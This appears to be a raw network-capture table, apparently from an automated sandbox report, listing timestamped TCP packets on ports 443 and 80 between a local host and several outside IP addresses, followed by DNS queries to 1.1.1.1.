                                                            Jan 7, 2025 20:25:00.191833973 CET49733443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:00.191838980 CET44349733104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:00.191857100 CET44349733104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:00.191904068 CET49733443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:00.203552961 CET49733443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:00.203573942 CET44349733104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:00.731029987 CET49737443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:00.731086969 CET44349737104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:00.731168032 CET49737443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:00.731565952 CET49737443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:00.731585979 CET44349737104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.155939102 CET49738443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.155983925 CET44349738104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.156037092 CET49738443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.156286001 CET49738443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.156296968 CET44349738104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.313954115 CET4434973535.190.80.1192.168.2.8
                                                            Jan 7, 2025 20:25:01.316565037 CET49735443192.168.2.835.190.80.1
                                                            Jan 7, 2025 20:25:01.316580057 CET4434973535.190.80.1192.168.2.8
                                                            Jan 7, 2025 20:25:01.317097902 CET4434973535.190.80.1192.168.2.8
                                                            Jan 7, 2025 20:25:01.317641020 CET49735443192.168.2.835.190.80.1
                                                            Jan 7, 2025 20:25:01.317725897 CET4434973535.190.80.1192.168.2.8
                                                            Jan 7, 2025 20:25:01.317909002 CET49735443192.168.2.835.190.80.1
                                                            Jan 7, 2025 20:25:01.359338999 CET4434973535.190.80.1192.168.2.8
                                                            Jan 7, 2025 20:25:01.501410007 CET4434973535.190.80.1192.168.2.8
                                                            Jan 7, 2025 20:25:01.501733065 CET49735443192.168.2.835.190.80.1
                                                            Jan 7, 2025 20:25:01.501771927 CET4434973535.190.80.1192.168.2.8
                                                            Jan 7, 2025 20:25:01.501831055 CET49735443192.168.2.835.190.80.1
                                                            Jan 7, 2025 20:25:01.829417944 CET44349737104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.830091953 CET49737443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:01.830111027 CET44349737104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.830396891 CET44349737104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.831392050 CET49737443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:01.831458092 CET44349737104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.831657887 CET49737443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:01.832463026 CET44349738104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.832957029 CET49738443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.832977057 CET44349738104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.833261013 CET44349738104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.833674908 CET49738443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.833736897 CET44349738104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.834095955 CET49738443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.875327110 CET44349737104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.875334024 CET44349738104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.976221085 CET44349738104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.976274014 CET44349738104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.976520061 CET49738443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.982284069 CET49738443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.982297897 CET44349738104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.989661932 CET49740443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.989686012 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.989826918 CET49740443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.989963055 CET49740443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:01.989978075 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.992060900 CET49741443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:01.992077112 CET44349741104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:01.992238998 CET49741443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:01.992441893 CET49741443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:01.992453098 CET44349741104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.274852037 CET44349737104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.274904966 CET44349737104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.274970055 CET49737443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:02.276367903 CET49737443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:02.276381969 CET44349737104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.750531912 CET49703443192.168.2.823.206.229.226
                                                            Jan 7, 2025 20:25:02.750704050 CET49703443192.168.2.823.206.229.226
                                                            Jan 7, 2025 20:25:02.755320072 CET4434970323.206.229.226192.168.2.8
                                                            Jan 7, 2025 20:25:02.755780935 CET4434970323.206.229.226192.168.2.8
                                                            Jan 7, 2025 20:25:02.762962103 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.763590097 CET49740443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:02.763603926 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.763921976 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.764456034 CET49740443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:02.764516115 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.764777899 CET49740443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:02.767075062 CET49742443192.168.2.823.206.229.226
                                                            Jan 7, 2025 20:25:02.767095089 CET4434974223.206.229.226192.168.2.8
                                                            Jan 7, 2025 20:25:02.767256021 CET49742443192.168.2.823.206.229.226
                                                            Jan 7, 2025 20:25:02.767764091 CET49742443192.168.2.823.206.229.226
                                                            Jan 7, 2025 20:25:02.767781973 CET4434974223.206.229.226192.168.2.8
                                                            Jan 7, 2025 20:25:02.770541906 CET44349741104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.770777941 CET49741443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:02.770807981 CET44349741104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.771146059 CET44349741104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.772242069 CET49741443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:02.772313118 CET44349741104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.772397995 CET49741443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:02.807337999 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.815334082 CET44349741104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.821839094 CET49741443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:02.912154913 CET44349741104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.912226915 CET44349741104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.912364006 CET49741443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:02.927714109 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.927814960 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.927870989 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:02.927944899 CET49740443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:02.927979946 CET49740443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:03.019304037 CET44349713142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:25:03.019392014 CET44349713142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:25:03.019532919 CET49713443192.168.2.8142.250.184.228
                                                            Jan 7, 2025 20:25:03.136722088 CET49740443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:03.136749029 CET44349740104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:03.142292976 CET49741443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:03.142307997 CET44349741104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:03.145806074 CET49713443192.168.2.8142.250.184.228
                                                            Jan 7, 2025 20:25:03.145844936 CET44349713142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:25:03.362601995 CET4434974223.206.229.226192.168.2.8
                                                            Jan 7, 2025 20:25:03.362714052 CET49742443192.168.2.823.206.229.226
                                                            Jan 7, 2025 20:25:03.610954046 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:03.610996962 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:03.611216068 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:03.611515999 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:03.611527920 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.117747068 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.118401051 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.118416071 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.118748903 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.119100094 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.119160891 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.119237900 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.119308949 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.119339943 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.119448900 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.119476080 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.413395882 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.413455963 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.413486958 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.413499117 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.413513899 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.413578987 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.413615942 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.413678885 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.413711071 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.413717985 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.413724899 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.413755894 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.413961887 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.414024115 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.414105892 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.414112091 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.418118954 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.418167114 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.418179035 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.469744921 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.503623009 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.503689051 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.503736019 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.503747940 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.503838062 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.503864050 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.503880978 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.503886938 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.503936052 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.504287004 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.504518032 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.504568100 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.504776001 CET49743443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:04.504787922 CET44349743104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.529047966 CET49744443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:04.529103994 CET44349744104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.529227018 CET49744443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:04.529562950 CET49744443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:04.529575109 CET44349744104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.999226093 CET44349744104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:04.999666929 CET49744443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:04.999696970 CET44349744104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:05.000025988 CET44349744104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:05.000533104 CET49744443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:05.000533104 CET49744443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:05.000611067 CET44349744104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:05.040205956 CET49744443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:05.166568995 CET44349744104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:05.166646004 CET44349744104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:05.167069912 CET49744443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:05.170532942 CET49744443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:05.170553923 CET44349744104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:16.851075888 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:16.851103067 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:16.851201057 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:16.851480007 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:16.851489067 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.324321032 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.324719906 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:17.324736118 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.325062037 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.325376034 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:17.325434923 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.325520039 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:17.325620890 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:17.325651884 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.325750113 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:17.325779915 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.588403940 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.588495970 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.588551998 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.588583946 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.588637114 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.588660002 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:17.588692904 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:17.588711023 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:17.589580059 CET49745443192.168.2.8104.18.95.41
                                                            Jan 7, 2025 20:25:17.589593887 CET44349745104.18.95.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.594512939 CET49746443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:17.594544888 CET44349746104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.594610929 CET49746443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:17.595032930 CET49746443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:17.595046043 CET44349746104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:17.791076899 CET49747443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:17.791129112 CET44349747188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:17.791197062 CET49747443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:17.798095942 CET49747443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:17.798119068 CET44349747188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.065891027 CET44349746104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:18.067636013 CET49746443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:18.067666054 CET44349746104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:18.067964077 CET44349746104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:18.068378925 CET49746443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:18.068437099 CET44349746104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:18.068531036 CET49746443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:18.115345001 CET44349746104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:18.226344109 CET44349746104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:18.226411104 CET44349746104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:18.226470947 CET49746443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:18.257821083 CET49746443192.168.2.8104.18.94.41
                                                            Jan 7, 2025 20:25:18.257844925 CET44349746104.18.94.41192.168.2.8
                                                            Jan 7, 2025 20:25:18.379367113 CET44349747188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.379623890 CET49747443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.379647017 CET44349747188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.380620956 CET44349747188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.380687952 CET49747443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.381040096 CET49747443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.381051064 CET49747443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.381093979 CET49747443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.381098986 CET44349747188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.381155968 CET49747443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.381377935 CET49748443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.381427050 CET44349748188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.381494999 CET49748443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.381675959 CET49748443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.381691933 CET44349748188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.844235897 CET44349748188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.844558954 CET49748443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.844593048 CET44349748188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.845591068 CET44349748188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.845657110 CET49748443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.846791029 CET49748443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.846927881 CET44349748188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.847028017 CET49748443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:18.847038031 CET44349748188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:18.899262905 CET49748443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:19.409719944 CET44349748188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:19.409835100 CET44349748188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:19.409897089 CET49748443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:19.410947084 CET49748443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:19.410974979 CET44349748188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:19.556258917 CET49751443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:19.556292057 CET44349751188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:19.556361914 CET49751443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:19.556612015 CET49751443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:19.556623936 CET44349751188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:20.015289068 CET44349751188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:20.015582085 CET49751443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:20.015594006 CET44349751188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:20.016593933 CET44349751188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:20.016657114 CET49751443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:20.017003059 CET49751443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:20.017059088 CET44349751188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:20.017178059 CET49751443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:20.017184019 CET44349751188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:20.059005976 CET49751443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:20.602271080 CET44349751188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:20.602371931 CET44349751188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:20.602447987 CET49751443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:20.610485077 CET49751443192.168.2.8188.114.96.3
                                                            Jan 7, 2025 20:25:20.610498905 CET44349751188.114.96.3192.168.2.8
                                                            Jan 7, 2025 20:25:22.512803078 CET4434974223.206.229.226192.168.2.8
                                                            Jan 7, 2025 20:25:22.512855053 CET49742443192.168.2.823.206.229.226
                                                            Jan 7, 2025 20:25:32.165385008 CET4970480192.168.2.8199.232.214.172
                                                            Jan 7, 2025 20:25:32.170568943 CET8049704199.232.214.172192.168.2.8
                                                            Jan 7, 2025 20:25:32.170623064 CET4970480192.168.2.8199.232.214.172
                                                            Jan 7, 2025 20:25:52.509397984 CET49793443192.168.2.8142.250.184.228
                                                            Jan 7, 2025 20:25:52.509444952 CET44349793142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:25:52.509502888 CET49793443192.168.2.8142.250.184.228
                                                            Jan 7, 2025 20:25:52.509838104 CET49793443192.168.2.8142.250.184.228
                                                            Jan 7, 2025 20:25:52.509850979 CET44349793142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:25:53.170392990 CET44349793142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:25:53.170989037 CET49793443192.168.2.8142.250.184.228
                                                            Jan 7, 2025 20:25:53.171009064 CET44349793142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:25:53.171350956 CET44349793142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:25:53.171653032 CET49793443192.168.2.8142.250.184.228
                                                            Jan 7, 2025 20:25:53.171709061 CET44349793142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:25:53.211378098 CET49793443192.168.2.8142.250.184.228
                                                            Jan 7, 2025 20:26:03.093060017 CET44349793142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:26:03.093135118 CET44349793142.250.184.228192.168.2.8
                                                            Jan 7, 2025 20:26:03.093193054 CET49793443192.168.2.8142.250.184.228
                                                            Jan 7, 2025 20:26:04.369915962 CET49793443192.168.2.8142.250.184.228
                                                            Jan 7, 2025 20:26:04.369946003 CET44349793142.250.184.228192.168.2.8
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 7, 2025 20:24:48.145605087 CET53638591.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:48.161221027 CET53545081.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:49.160625935 CET53620221.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:52.448355913 CET5745053192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:52.448477030 CET5207653192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:52.455032110 CET53574501.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:52.455210924 CET53520761.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:53.709975004 CET6263853192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:53.710144043 CET5136353192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:53.720381975 CET53513631.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:53.724263906 CET53626381.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:55.680020094 CET5383353192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:55.682362080 CET5647653192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:55.683520079 CET6323853192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:55.683768034 CET5323553192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:55.684269905 CET6547353192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:55.684590101 CET5071953192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:55.687005043 CET53538331.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:55.689152956 CET53564761.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:55.690093040 CET53632381.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:55.690391064 CET53532351.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:55.691040039 CET53654731.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:55.691503048 CET53507191.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:56.395559072 CET5083453192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:56.395740032 CET5654353192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:56.402251005 CET53508341.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:56.402468920 CET53565431.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:56.461631060 CET5414253192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:56.462189913 CET6253553192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:56.468343973 CET53541421.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:56.468894958 CET53625351.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:57.020486116 CET6154753192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:57.020613909 CET6152553192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:57.027395010 CET53615471.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:57.027441025 CET53615251.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:57.054493904 CET5872253192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:57.054620028 CET5685853192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:57.061235905 CET53568581.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:57.061270952 CET53587221.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:59.165947914 CET5158053192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:59.166377068 CET5618253192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:24:59.173099995 CET53515801.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:24:59.173238993 CET53561821.1.1.1192.168.2.8
